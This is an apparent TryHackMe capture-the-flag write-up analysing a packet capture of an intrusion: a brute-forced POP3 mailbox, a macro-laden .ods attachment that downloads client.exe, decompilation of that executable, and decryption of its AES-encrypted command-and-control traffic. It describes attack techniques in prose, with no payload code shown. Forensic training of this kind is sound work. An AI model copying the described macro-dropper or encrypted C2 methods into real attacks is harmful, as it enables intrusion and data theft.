TryHackMeHackTheBoxLinkedIn

Pressed

A full-scale intrusion was recently detected within the network, raising critical alarms. - by hadrian3689

LogoPressedTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

A full-scale intrusion was recently detected within the network, raising critical alarms. Fortunately, a packet capture (PCAP) was recorded during the incident, capturing the attacker's initial entry and subsequent actions.

Our task is to analyse the traffic, identify how the attacker gained access, and uncover the sequence of malicious activity.

We download the PCAP file from the box provided and use Wireshark to analyze it.

Analyzing POP3 Traffic

Starting with packet no. 2448, we see POP3 packets and how someone is trying unsuccessfully to log in with different emails.

Starting with packet 2886, we can detect other POP3 traffic; the attacker was able to log in successfully.

We see it was Hazel's account that got compromised. We are also able to extract the password used.

Analysis Of The Attachment

We follow the TCP traffic at packet 2886 and see hazel was pressured to open the sheets.ods file.

We copy the base64 attachment which is the sheets.ods file and decode it.

We open that file, and inspect the macros and are able to spot the download and execution of a file called client.exe. Furthermore there is something echoed.

This is the first part of the flag.

Tracing The File Download

Now we know the download and execution of a file. We look for that to find the next part of the flag.

We see the download happens at packet no. 2962.

We follow the TCP stream...

...and swtich from ASCII to RAW!

Next, we save the RAW stream to a file.

Decompilation Of The Malicious File

We remove first lines until the MZ magic bytes.

The following images show the use of Nano. But it seems like Nanos way of removing lines CTRL+k behaves differently than the way Vim dd does. And the file produced by Nano was not being able to properly processed by Ghidra later. Use Vim instead, please!

Using Ghidra, we analyze the executable and inspect the main function.

Here we see a connection setup on port 443, which we will find later in the PCAP.

Furthermore there is some command execution going on that is encrypted by AES:

At the top of the main function we spot the usage of a key variable.

By double clicking on rhI1YazJLaLVgWv4 we find the values used for the encryption.

Decryption Of The C2 Traffic

Back to our traffic on port 443:

We inpect the packet 6728 and 6729 and copy the value of the TCP payload...

... and use CyberChef to decrypt the paylaod. We are able to detect the first command issued: whoami

And also its corresponding output:

On packet no. 6731 we see the creation of another user.

Which happens to be the second part of the flag.

We move on with each command issued:

Packet no. 6735:

Packet no. 6741:

Packet no. 6743 - reading clients.csv:

Packet no. 6744 output of clients.csv contains the final part of the flag:

For the final flag we put everything together and base64 decode it.

PreviousSequenceNextVoyage

Last updated

Was this helpful?